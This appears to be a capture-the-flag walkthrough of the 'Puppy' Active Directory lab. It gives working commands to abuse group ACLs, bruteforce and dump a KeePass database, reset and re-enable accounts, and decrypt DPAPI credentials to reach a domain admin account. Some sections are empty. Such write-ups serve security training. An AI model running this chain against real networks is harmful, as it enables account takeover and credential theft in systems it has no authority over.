Puppy

Initial machine information

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

Overview

Puppy is an Active Directory machine where starting credentials have GenericWrite over a group (via an intermediate group), enabling group membership manipulation to access a Dev share. The share contains a KeePass database whose master password bruteforces quickly, yielding multiple credentials. BloodHound maps further ACL paths leading to a disabled account that can be re-enabled. A site backup ZIP in that user's accessible share contains a password for another account. DPAPI credential files on that user's profile decrypt to reveal the admin credentials.

Recon

Nmap

sudo nmap -sC -sV -vv -oA tcp 10.129.232.75 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.232.75

Standard Windows DC. Credentials levi.james:KingofAkron2025! are provided.

SMB Enumeration

Run NXC with provided credentials to validate access:

BloodHound Mapping

bloodhound-ce-python -c all -u levi.james -p 'KingofAkron2025!' -d puppy.htb -dc puppy.htb --dns-tcp -ns 10.129.232.75

BloodHound reveals: levi.james → HR group → GenericWrite over DEVELOPERS group. This allows adding arbitrary members to the Developers group.

Foothold

GenericWrite - Self-Add to Developers

Add levi.james to the DEVELOPERS group:

net rpc group addmem "DEVELOPERS" "levi.james" \
  -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "puppy.htb"

Access the newly available Dev share:

KeePass Bruteforce

The Dev share contains recovery.kdbx - a KeePass database. Bruteforce the master password using:

https://github.com/toneillcodes/brutalkeepass/

Master password: liverpool

Extract credentials with Python:

from pykeepass import PyKeePass
 
kp = PyKeePass("/path/to/recovery.kdbx", password="liverpool")
for e in kp.entries:
    print(e)
    print(e.password)

Extracted credentials:

JAMIE WILLIAMSON  → JamieLove2025!
ADAM SILVER       → HJKL2025!
ANTONY C. EDWARDS → Antman2025!
STEVE TUCKER      → Steve2025!
SAMUEL BLAKE      → ILY2025!

ACL Chain - ANT.EDWARDS → ADAM.SILVER

BloodHound shows:

• Anthony (ANT.EDWARDS) has read/write on the Dev share
• Anthony has GenericAll over ADAM.SILVER via the Senior Devs group

Reset Adam.Silver's password using Anthony's credentials:

net rpc password "adam.silver" 'HJKL2025!' \
  -U "puppy.htb"/"ANT.EDWARDS"%'Antman2025!' -S "puppy.htb"

Adam.Silver's account is disabled - re-enable it:

bloodyAD --host 10.129.232.75 -u "ANT.EDWARDS" -p 'Antman2025!' -d 'puppy.htb' \
  remove uac "adam.silver" -f ACCOUNTDISABLE

WinRM access as Adam.Silver:

evil-winrm-py -i 10.129.232.75 -u adam.silver -p 'HJKL2025!'

Lateral Movement

Switch to an AdaptixC2 beacon from the Evil-WinRM session:

A site-backup.zip is found in an accessible location. The ZIP contains a config file with a password for steph.cooper:

steph.cooper:ChefSteph2025!

Obtain an AdaptixC2 beacon as steph.cooper:

Privilege Escalation

DPAPI - Credential File Decryption

Seatbelt finds Windows Credential Manager files (DPAPI-encrypted) in steph.cooper's profile:

.\Seatbelt.exe WindowsCredentialFiles

Download the credential files and decrypt them locally. First, decrypt the DPAPI master key using the user's password and SID:

impacket-dpapi masterkey -file key -password 'ChefSteph2025!' \
  -sid S-1-5-21-1487982659-1829050783-2281216199-1107

Then decrypt the credential file with the derived key:

impacket-dpapi credential -file local \
  -key "0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84"

Decrypted credentials:

Username : steph.cooper_adm
Password : FivethChipOnItsWay2025!

steph.cooper_adm is an administrative account. Authenticate and retrieve the root flag.

Attack Chain Summary